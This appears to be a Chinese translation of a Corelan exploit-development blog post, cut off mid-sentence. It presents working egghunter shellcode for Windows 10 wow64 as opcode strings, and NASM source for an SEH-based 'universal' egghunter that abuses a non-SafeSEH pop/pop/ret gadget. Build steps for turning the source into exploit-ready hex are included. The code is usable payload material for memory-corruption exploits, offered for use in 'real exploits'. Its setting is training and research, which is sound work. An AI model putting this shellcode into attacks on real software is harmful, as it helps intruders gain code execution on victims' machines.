Windows 10 Egghunter (wow64) 及更多内容

引言

好吧，我有个坦白：我一直对Egghunter有些着迷。但这并不意味着我喜欢使用（或滥用）Egghunter仅仅因为我喜欢它的功能。事实上，我认为尽量避免使用Egghunter是一个好习惯，因为它们往往会减慢速度。我的意思是，我对在不使进程崩溃的情况下搜索内存的技术感到着迷。这只是个人喜好，不太重要。

真正重要的是Corelan Team回来了。好吧，是我回来了。这是我近三年来的第一篇（技术）帖子，也是自Corelan Team在那之前“逐渐消失”以来的第一篇帖子。（事实上，我很好奇（部分）原始Corelan Team成员是否能够再次找到空闲时间，联手开始进行/发布一些研究。我当然希望如此，但让我们看看会发生什么。）

正如你们中的一些人已经知道的，我最近离开了我的日常工作。（故事很长，太长不适合这篇文章。很高兴在喝酒时分享细节。）我创办了一家名为“Corelan Consulting”的新公司，并试图通过漏洞开发培训和网络安全咨询谋生。培训进展顺利，2019年几乎已排满，并且已经在规划2020年的课程。你可以在这里找到培训日程。如果你有兴趣在你的公司或会议上设置Corelan Bootcamp或Corelan Advanced课程——先阅读推荐信，然后联系我 :) 我仍然需要提高与锁定咨询工作相关的销售技巧，但我相信最终一切都会顺利。（是的，如果你想与我合作，请联系我，我可以兼职从事治理/风险管理和评估工作；-）)

无论如何，在构建2019年版的Corelan Bootcamp并更新Windows 10材料时，我意识到Lincoln编写的Windows 7的wow64 Egghunter在Windows 10上不再工作。事实上，我有点预期它会失败，因为我们早就知道Microsoft在每个主要Windows版本中都会更改系统调用号。由于最常用的Egghunter机制基于系统调用的使用，显然更改号码会破坏Egghunter。

顺便说一句：系统调用（及其号码）在这里有文档记录：https://j00ru.vexillium.org/syscalls/nt/64/（感谢Mateusz “j00ru” Jurczyk）。你可以在上述网站的表格中找到“NtAccessCheckAndAuditAlarm”系统调用号的演变。

无论如何，更改系统调用号听起来并不太令人兴奋或困难，但也很清楚，参数和堆栈布局、系统调用在Windows 10中的行为也与Windows 7版本不同。

我们发现了一些win10 Egghunter PoC在流传，但发现它们在真实漏洞利用中不可靠。Lincoln看了一会儿，做了一些调试，并生成了一个适用于Windows 10的版本。:)

所以，这意味着我们很自豪能够宣布一个适用于Windows 10的（wow64）Egghunter。下面的版本已经在真实漏洞利用和目标中测试过。

wow64 Egghunter for Windows 10

如前所述，挑战在于弄清楚新系统调用期望参数的位置和方式，它如何更改寄存器和堆栈以确保参数始终在正确的位置，并提供预期的功能：测试给定页面是否可访问，并且在不使进程死亡的情况下这样做。

这是更新后的例程：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

"\x33\xD2"              #XOR EDX,EDX
"\x66\x81\xCA\xFF\x0F"  #OR DX,0FFF
"\x33\xDB"              #XOR EBX,EBX
"\x42"                  #INC EDX
"\x52"                  #PUSH EDX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x6A\x29"              #PUSH 29  (system call 0x29)
"\x58"                  #POP EAX
"\xB3\xC0"              #MOV BL,0C0
"\x64\xFF\x13"          #CALL DWORD PTR FS:[EBX] (perform the system call)
"\x83\xC4\x10"          #ADD ESP,0x10
"\x5A"                  #POP EDX
"\x3C\x05"              #CMP AL,5
"\x74\xE3"              #JE SHORT
"\xB8\x77\x30\x30\x74"  #MOV EAX,74303077
"\x8B\xFA"              #MOV EDI,EDX
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDE"              #JNZ SHORT
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDB"              #JNZ SHORT
"\xFF\xE7"              #JMP EDI

这个Egghunter在Windows 10上工作得很好，但它假设你在wow64环境中运行（64位操作系统上的32位进程）。当然，正如Lincoln在他的博客文章中所解释的，你可以简单地添加一个检查来确定架构，并使Egghunter在原生32位操作系统上也能工作。

你也可以用mona.py生成这个Egghunter——只需运行!mona egg -wow64 -winver 10。

在调试这个Egghunter（或任何使用系统调用的wow64 Egghunter）时，你会注意到系统调用执行期间会出现访问违规。这些访问违规可以安全地通过，并由操作系统处理……但调试器每次看到访问违规时都会中断。（本质上，当代码尝试测试不可读的页面时，调试器会中断。换句话说，你会得到大量的访问违规，需要你手动干预。）

如果你使用Immunity Debugger，你可以简单地告诉调试器忽略访问违规。为此，点击“debugging options”，并打开“exceptions”选项卡。在“Add range”下添加以下十六进制值：

1
2

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

当然，当你完成调试Egghunter后，不要忘记再次删除这两个异常 :-)

展望未来

当然，Microsoft有权在其操作系统中更改他们想要的任何内容。我认为开发人员不应该自己发出系统调用，我相信他们应该使用ntdll.dll中的包装函数。换句话说，Microsoft更改系统调用号应该是“安全的”。我不知道每个Windows版本系统调用号递增的背后是什么，我也不知道系统调用号是否会永远保持不变，因为Windows 10已被标记为“最后一个Windows版本”。从Egghunter的角度来看，那将是很棒的。随着越来越多的人采用Windows 10，Egghunter的成功率也会越来越高。但实际上，我不知道这是否是一个有效的假设。

无论如何，这让我思考：是否有办法使用不同的技术来使Egghunter工作，而不使用系统调用？如果是这样，该技术是否也适用于旧版本的Windows？如果我们不使用系统调用，它是否能在原生x86和wow64环境中立即工作？

让我们看看。

异常处理

关于Egghunters的原始论文（“Safely Searching Process Virtual Address Space”由skape撰写（2004年！）已经介绍了使用自定义异常处理程序来处理如果你尝试从不可访问的页面读取时将发生的访问违规。通过使处理程序指向Egghunter内部，Egghunter将能够继续运行。不幸的是，原始实现似乎不再工作。在进行一些测试时（许多年前，以及最近在Windows 10上），看起来操作系统并不真正允许你使异常处理程序直接指向堆栈（没有尝试堆堆，但我预计会有相同的限制）。换句话说，如果Egghunter从堆栈或堆堆运行，你将无法使Egghunter使用自身作为异常处理程序并继续运行。

在寻找可能的解决方案之前，让我们提醒自己异常处理机制是如何工作的。当操作系统看到异常并决定将其传递给进程中的相应线程时，它将指示ntdll.dll中的一个函数启动该线程内的异常处理机制。此例程将检查偏移量0处的TEB（可通过FS:[0]访问），并检索堆栈上异常处理链中最顶层的记录的地址。每个记录由2个字段组成：

1
2
3
4

struct EXCEPTION_REGISTRATION {
   EXCEPTION_REGISTRATION *nextrecord; // 指向下一个记录的指针 (nseh)
   DWORD handler; // 指向处理程序函数的指针
};

最顶层的记录包含将首先调用的例程的地址，以检查应用程序是否可以处理异常。如果该例程失败，将尝试链中的下一个记录（直到其中一个例程能够处理异常，或者将使用默认处理程序，将进程发送到天堂）。所以，换句话说，ntdll.dll中的例程将找到记录，并调用“handler”地址（即放置在记录第二个字段中的任何内容）。

所以，将其转化为Egghunter世界：如果我们想保持对异常发生时的控制，我们将必须创建一个自定义的“最顶层”SEH记录，确保在Egghunter执行期间始终是最顶层记录，并且我们必须使记录处理程序指向一个允许我们的Egghunter继续运行并移动到下一个页面的例程。再次，如果我们的“自定义”记录是最顶层记录，我们将确保它将是第一个被使用的记录。

当然，我们应该小心，并考虑运行异常处理机制的后果和影响：

• 异常处理机制将更改ESP的值。功能将在新的ESP位置创建一个“异常分发器堆栈”帧，其中指向原始SEH帧的指针位于ESP+8。我们将必须“撤销”对ESP的此更改，以确保它指回堆栈上Egghunter存储其数据的区域。
• 接下来，我们还应该避免一直创建新记录。相反，我们应该尝试继续使用相同的记录，避免一直将数据推送到堆栈，避免我们用尽堆栈空间。此外，当然，Egghunter需要能够从内存中的任何位置运行。
• 最后，无论我们作为“SE处理程序”（记录的第二个字段）放入什么，都必须是SAFESEH兼容的。不幸的是，这是我“解决方案”的弱点。此外，如果SEHOP处于活动状态，我的例程将无法工作。（但据我所知，在客户端系统上默认不活动。）

创建我们自己的自定义SEH记录意味着我们将向堆栈写入一些内容，覆盖/损坏已经存在的内容。所以，如果你的Egghunter/shellcode也在堆栈上的该位置附近，你可能想在运行Egghunter之前调整ESP。只是说一下 :)

这是我的基于SEH的Egghunter的样子（准备用nasm编译）：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

; Universal SEH based egg hunter (x86 and wow64)
; tested on Windows 7 & Windows 10
; written by Peter Van Eeckhoutte (corelanc0d3r)
; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com
;
; warning: will damage stack around ESP
;
; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below
;

[BITS 32]
CALL $+4			; getPC routine
RET
POP ECX
ADD ECX,0x1d			; offset to "handle" routine

;set up SEH record
XOR EBX,EBX
PUSH ECX			; remember where our 'custom' SE Handler routine will be
PUSH ECX			; p/p/r will fly over this one
PUSH 0x90c3585c			; trigger p/p/r again :)
PUSH 0x44444444			; Replace with P/P/R address  ** PLACEHOLDER **
PUSH 0x04EB5858			; SHORT JUMP
MOV DWORD [FS:EBX],ESP		; put our SEH record to top of chain

JMP nextpage

handle:				; our custom handle
	SUB ESP,0x14		; undo changes to ESP
	XOR EBX,EBX
	MOV DWORD [FS:EBX],ESP	; make our SEH record topmost again
	MOV EDX, [ESP+24]	; pick up saved EDX
	INC EDX

nextpage:
	OR DX, 0x0FFF
	INC EDX
	MOV [ESP+24], EDX	; remember where we are searching
	MOV EAX, 0x74303077	; w00t
	MOV EDI, EDX
	SCASD
	JNZ nextpage+5
	SCASD
	JNZ nextpage+5
	JMP EDI

让我们看看Egghunter的各个组件。

首先，Hunter以一个“GetPC”例程开始（旨在找到其在内存中的绝对地址），然后是一条指令，该指令将0x1d字节添加到它能够使用该GetPC例程检索到的地址。添加此偏移后，ECX将包含实际“处理程序”例程在内存中的绝对地址。（在上面的代码中由标签“handle”引用）。请记住，Egghunter需要能够在运行时动态确定此位置，因为Egghunter将使用异常处理程序机制返回自身并继续运行Egghunter。这意味着我们需要知道（确定）它在哪里，将引用存储在堆栈上，以便我们可以在异常处理机制期间稍后“检索/跳转”到它。

接下来，代码正在创建一个新的自定义SEH记录。虽然SEH记录只包含2个字段，但代码实际上将5个特殊构造的值推送到堆栈上。只有最后2个将成为SEH记录，其他用于允许异常处理程序恢复ESP并继续执行Egghunter。让我们看看推送了什么以及为什么：

• PUSH ECX：这是“handle”例程在内存中的地址，由之前的GetPC例程确定。异常处理程序最终需要返回到这个地址。

• PUSH ECX：我们再次推送地址，但这个不会被使用。我们将使用pop/pop/ret指针两次。第一次将用于异常处理程序将执行带回我们的代码，第二次将用于返回到存储在堆栈上的“ECX”。第二个ECX只是为了补偿p/p/r中的第二个POP。你可以在堆栈上推送任何你喜欢的内容。

• PUSH 0x90c3585C：此代码将被执行。它是POP ESP、POP EAX、RET。这将将堆栈重置回我们存储SEH记录的堆栈上的原始位置。RET将将执行转移回堆栈上的p/p/r指针（SEH记录的一部分）。换句话说，p/p/r指针将被使用两次。第二次，它最终将返回到存储在堆栈上的ECX地址。（参见之前的PUSH ECX指令）

• 接下来，通过将另外2个值推送到堆栈来创建真正的SEH记录：

  • 指向P/P/R的指针（必须是非safeseh保护的指针）。我们必须使用p/p/r，因为我们不能使此处理程序字段直接指向堆栈（或堆堆）。由于我们不能只是让异常机制直接返回我们的代码，我们将使用pop/pop/ret来保持对执行流的控制。在上面的代码中，你必须将0x44444444值替换为非SafeSEH保护的pop/pop/ret的地址。然后，当异常发生时（即当Egghunter到达不可访问的页面时），pop/pop/ret将第一次被触发执行，返回到SEH记录第一个字段中的4个字节。
  • 在SEH记录的第一个字段中，我放置了2个pops和一个短跳转向前序列。这将稍微调整堆栈，使指向SEH记录的指针位于堆栈顶部。接下来它将跳转到之前推送到堆栈上的指令序列（0x90C3585C）。如前所述，该序列将再次触发POP/POP/RET，最终将返回到存储的ECX指针（即Egghunter所在的位置）

为了完成SEH记录的创建并将其标记为最顶层记录，我们只需将其位置写入TEB。由于我们的新自定义SEH记录当前位于ESP，我们可以简单地将ESP的值写入偏移量0处的TEB（MOV DWORD [FS:EBX],ESP）。（这就是我们首先清除EBX的原因。）

此时，Egghunter已准备好测试页面是否可读。代码将使用EDX作为读取的参考。例程首先转到页面的末尾（OR DX, 0x0FFF），然后转到下一页的开头（INC EDX），然后我们将EDX的值存储在堆栈上（在[ESP-4]），以便异常处理程序稍后可以获取它。如果读取尝试（SCASD）失败，将触发访问违规。访问违规将使用我们的自定义SEH记录（因为它应该是最顶层记录），并且该例程设计为恢复Egghunter的执行（通过运行“handle”例程，最终将从堆栈恢复EDX指针并移动到下一页）。“handle”例程将：

• 再次调整堆栈，纠正其位置以使其在运行Egghunter时位于应该的位置。（SUB ESP,0x14）
• 接下来，它将确保我们的自定义记录再次是最顶层SEH记录（只是预期某些其他代码可能添加了新的最顶层记录）。
• 最后，它将从堆栈中获取一个引用（我们存储了上次尝试访问的地址）并继续（使用下一页）。

如果页面可读，Egghunter将检查标签的存在，两次。如果找到标签，最终的“JMP EDI”将告诉CPU运行双标签之后放置的代码。

在调试Egghunter时，你会注意到它会抛出访问违规（当代码尝试访问不可访问的页面时）。当然，在这种情况下，这些访问违规是绝对正常的，但你仍然必须将异常传递回应用程序（Shift F9）。你也可以配置Immunity Debugger以自动忽略（并传递）异常，但配置Exceptions。为此，点击“debugging options”，并打开“exceptions”选项卡。在“Add range”下添加以下十六进制值：

1
2

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

当然，当你完成调试Egghunter后，不要忘记再次删除这两个异常。

为了使用Egghunter，你需要首先将asm指令转换为操作码。为此，你需要安装nasm。（我使用了来自https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/的Win32安装程序）

将上面的asm代码片段保存到文本文件中（例如“c:\dev\win10_egghunter_seh.nasm”）。接下来，运行“nasm”将其转换为包含操作码的二进制文件：

1

"C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm

接下来，将二进制文件的内容转储为可以在脚本和漏洞利用中使用的十六进制格式：

1

python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj

（你可以在Corelan的github存储库中找到bin2